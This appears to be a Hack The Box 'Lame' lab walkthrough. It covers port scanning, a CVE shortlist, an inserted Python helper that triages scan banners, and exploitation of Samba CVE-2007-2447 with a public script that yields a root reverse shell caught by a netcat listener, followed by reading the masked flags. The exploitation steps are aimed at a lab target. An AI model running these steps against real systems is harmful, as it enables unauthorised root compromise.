HTB Lame walkthrough
Foothold
$ rustscan -a 10.129.226.162 --ulimit 5000 -- -sV -A -Pn
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.226.162:22
Open 10.129.226.162:21
Open 10.129.226.162:139
Open 10.129.226.162:445
Open 10.129.226.162:3632
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-24 21:35 JST
(snip)
PORT     STATE SERVICE     REASON  VERSION
21/tcp   open  ftp         syn-ack vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.15
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
| ssh-dss (snip)
|   2048 5656240f211ddea72bae61b1243de8f3 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew==
139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 58787/tcp): CLEAN (Timeout)
|   Check 2 (port 13873/tcp): CLEAN (Timeout)
|   Check 3 (port 58565/udp): CLEAN (Timeout)
|   Check 4 (port 53271/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-07-24T08:36:14-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m21s, deviation: 2h49m43s, median: 20s

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:36
Completed NSE at 21:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:36
Completed NSE at 21:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:36
Completed NSE at 21:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.86 seconds
- vsftpd 2.3.4 => vsftpd 2.3.4 backdoor (doesn't work???)
- OpenSSH 4.7p1 => CVE-2008-5161, etc.
- Samba smbd 3.0.20 => CVE-2007-2447 (https://github.com/amriunix/CVE-2007-2447)
- distccd v1 => CVE-2004-2687 (https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
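As an added example (not part of the original walkthrough), a small Python triage helper that parses the nmap -sV port lines from the scan above and maps each banner to the candidate issue in this list, reporting "unknown" when the banner carries no usable version (as on port 139). The sample scan lines are constructed from the page, and the rule table with its version ranges is my own assumption for illustration, not an authoritative vulnerability database.

```python
import re

# Constructed sample: the service lines from the nmap -sV scan above, one port per line.
SCAN_OUTPUT = """\
21/tcp   open  ftp         syn-ack vsftpd 2.3.4
22/tcp   open  ssh         syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

PORT_LINE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+\S+\s+\S+\s+(.*)$")
VERSION = re.compile(r"\b(\d+(?:\.\d+)+)")

# Assumed triage rules for the products seen on this host:
# product -> (lowest affected, highest affected, note). A None range means
# "flag any exposed instance regardless of version" (distccd's "v1" is the
# protocol version, so the banner says nothing useful about the package).
RULES = {
    "vsftpd":  ((2, 3, 4), (2, 3, 4), "vsftpd 2.3.4 backdoor"),
    "OpenSSH": ((4, 7), (4, 7), "CVE-2008-5161"),
    "Samba":   ((3, 0, 0), (3, 0, 25), "CVE-2007-2447 (username map script)"),
    "distccd": (None, None, "CVE-2004-2687 (distcc without access control)"),
}

def parse_version(text):
    """Return the first dotted version in text as an int tuple, or None."""
    m = VERSION.search(text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def triage(scan_text):
    """Map each open port's banner to (port, verdict, note), where verdict is
    'vulnerable', 'clean' or 'unknown'. Unknown means a human must check."""
    results = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, banner = int(m.group(1)), m.group(2)
        product = next((p for p in RULES if banner.startswith(p)), None)
        if product is None:
            results.append((port, "unknown", "no rule for banner"))
            continue
        low, high, note = RULES[product]
        ver = parse_version(banner)
        if low is None:
            results.append((port, "vulnerable", note))
        elif ver is None:
            results.append((port, "unknown", f"{product}: version not in banner"))
        elif low <= ver <= high:
            results.append((port, "vulnerable", note))
        else:
            results.append((port, "clean", f"{product} {'.'.join(map(str, ver))}"))
    return results
```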
User&Root
After a fair amount of trial and error, Samba smbd 3.0.20 => CVE-2007-2447 turned out to be a direct hit for root!!!!
$ git clone https://github.com/amriunix/CVE-2007-2447
Cloning into 'CVE-2007-2447'...
remote: Enumerating objects: 11, done.
remote: Total 11 (delta 0), reused 0 (delta 0), pack-reused 11
Receiving objects: 100% (11/11), done.
Resolving deltas: 100% (3/3), done.
$ cd CVE-2007-2447
$ ls
README.md  usermap_script.py
$ python usermap_script.py
[*] CVE-2007-2447 - Samba usermap script
[-] usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
$ python usermap_script.py 10.129.226.162 445 10.10.16.15 4444
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.16.15] from (UNKNOWN) [10.129.226.162] 60922
id
uid=0(root) gid=0(root)
cat /root/root.txt
cf**************************************
ls /home
ftp
makis
service
user
ls /home/makis
user.txt
cat /home/makis/user.txt
52*************************************